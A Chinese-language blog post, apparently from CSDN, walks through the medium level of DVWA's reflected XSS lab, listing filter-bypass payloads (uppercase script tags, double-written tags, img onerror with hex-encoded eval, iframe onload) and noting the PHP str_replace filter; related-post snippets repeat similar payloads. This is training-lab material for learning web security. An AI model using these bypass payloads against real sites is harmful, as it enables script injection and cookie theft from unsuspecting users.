DVWA - XSS Reflected(medium)

最新推荐文章于 2024-04-11 21:15:03 发布
最新推荐文章于 2024-04-11 21:15:03 发布
阅读量232 收藏
点赞数
分类专栏: dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42630215/article/details/106644485
版权

输入常规的payload

<script>alert(document.cookie)</script>

在这里插入图片描述
script标签应该是被过滤了

方法一 大写绕过

<SCRIPT>alert(document.cookie)</SCRIPT>

在这里插入图片描述
在这里插入图片描述
执行成功

方法二 双写绕过

<sc<script>ript>alert('xss')</script>

在这里插入图片描述
方法三 其他标签

在这里插入代码片

img标签:

<img src=1 οnerrοr=alert('xss')>
 <img src="1" οnerrοr=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>

iframe标签:

<iframe οnlοad=alert(1)>
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>

在这里插入图片描述

PHP代码分析
在这里插入图片描述
pre标签
可定义预格式化的文本。被包围在 pre 元素中的文本通常会保留空格和换行符。而文本也会呈现为等宽字体。该标签的一个常见应用就是用来表示计算机的源代码。

header (“X-XSS-Protection: 0”);
在这里插入图片描述
在这里插入图片描述
array_key_exists()函数
在这里插入图片描述

str_replace() 函数
在这里插入图片描述

S1xTwe1ve
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA(三)反射型XSSXSS(Reflected))
qq_42180996的博客
07-25 2081
反射型XSS 一、实验环境 二、实验原理 1.概念 2.xss漏洞类型 3.原理 4.原理图解 三、实验步骤 (一)Low别 1.源码 2.正确输入 3.直接嵌入 4.元素事件之加载即弹窗 5.元素事件之登入超链接 6.元素事件之查找超链接图片 7.元素事件之点击即弹窗 8.重定向至百度 9.重定向至超链接 10.重定向至超链接图片 11.获取cook...
DVWA-XSS(Reflected)
weixin_44866139的博客
01-31 612
Low 1、查看服务器端源代码 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '&l...
DVWA-XSS(DOM)Low Medium High低中高别_就tm你叫韩毅啊
最新发布
2401_84023579的博客
04-11 973
总之啊,家里没矿的同学们,如果你们想以后的日子过得好一些,多想想你们的业余时间怎么安排吧;技术方面的提升肯定是重中之重,但是技术外的一些“软实力”也不能完全忽视,很多时候升职确实是因为你的技术足够强,但也与你的“软实力”密切相在这我也分享一份大佬自己收录整理的Android学习PDF+架构视频+面试文档+源码笔记,还有高架构技术进阶脑图、Android开发面试专题资料,高进阶架构资料这些都是我闲暇还会反复翻阅并给下属员工学习的精品资料。
DVWA - XSS (Reflected) (low, medium, high)
无节操
01-06 1750
low无验证,直接注入<script>alert(document.cookie)</script>medium查看源码发现过滤了<scrpit>标签$name = str_replace( '<script>', '', $_GET[ 'name' ] ); 绕过思路:大写<Script>alert(document.cookie)</script>high查看源码,可发现用正则过滤了$name
DVWA 反射型XSS(Reflected)
qq_43452198的博客
04-23 334
XSS Reflectedlowmediumhighimpossible low <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback fo...
DVWA -XSS Reflected (low)
qq_42630215的博客
06-08 166
随便输入看看反应 输入 <script>alert(document.cookie)</script> 成功弹窗F12看看代码, 分析代码 array_key_exists()函数检查数组里是否有指定的键名或索引。有返回true,没有返回false代码只是判断了name参数是否为空,如果不为空的话就直接打印出来,并没有对name参数做任何的过滤和检查,存在非常明显的XSS漏洞. ...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全别组成,包括“低”、“中”、“高”和“不可能”,每个别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWAXSS-----------------(Medium
qq_43665434的博客
02-20 198
DVWAXSS-----------------(Medium) 1、Reflected 输入<script>alert(/xss/)</script> 查看网页源码: 发现过滤了<script>,不慌不慌。。 尝试绕过: 大小写混合<ScRiPt>alert(/xss/)</script> 拼凑:<scr<script>ipt>alert(/xss/)</script> img标签:<img src
DVWA-----------XSS (Reflected)
haha1314的博客
05-18 674
XSS(反射性) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第三方网站; 一、low别 一、判断是否有xss漏洞 输入 :北京 输入: 获取cookie,等等,反射型XSS,可利用性不大。 二、medium别 没有反应,被过滤掉了 尝试大小写转换 说明被过...
DVWA - XSS DOM (medium)
qq_42630215的博客
06-04 507
随便在选项里选一个,url中会出现我们选的哪个。 看看可不可以用<script>alert(document.cookie)</script> 127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie)</script> 发现不会执行,而且语句也没有在url中显示,只显示English应该是过滤了方法一 换一个试一下<img src=1 one
XSS攻击-DVWAMedium
天威一号
11-21 312
士大夫VS的
DVWA中(medium)、高(high)xss
白帽小学二年级的博客
12-23 984
DVWA中(medium)、高(high)xss
DVWAXSS(Reflected
LainWith的博客
08-28 407
难度 源代码: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?> 可
刷题之旅第7站,DVWA XSS reflect (low,medium,high)
cc菜的一批
01-21 330
一、什么是XSS reflect XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。 二、DVWA 实战 1、low难度 没有进行任何过滤,那么直接写js代码 <script>alert('hack')</script> 2、medium 难度 直接输入 被过滤掉了。 使用大小写即可绕过, <sCript...
dvwa详解_DVWA(六):XSS-Reflected 反射型XSS全等详解
weixin_42234804的博客
01-26 475
XSS 概念:由于web应用程序对用户的输入过滤不严,通过html注入篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。XSS类型:Reflected(反射型):只是简单的把用户输入的数据反射给浏览器,需要诱导用户点击一个恶意链接才能攻击成功。存储型:将用户输入的数据存储在服务器端,每次用户访问都会被执行js脚本DOM型:文本对象模式xss,通过修改页面的DOM节点形成的XS...
DVWA靶场存储型XSS漏洞实验
weixin_44851588的博客
05-26 4591
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储型XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSSXSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
DVWA--反射型XSSXSS (Reflected))
箭雨镜屋
12-16 1970
LOW 通步骤 源码分析
DVWAXSS(Reflected)反射型XSS
RexHa的博客
10-07 2079
dvwa 反射型XSS
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值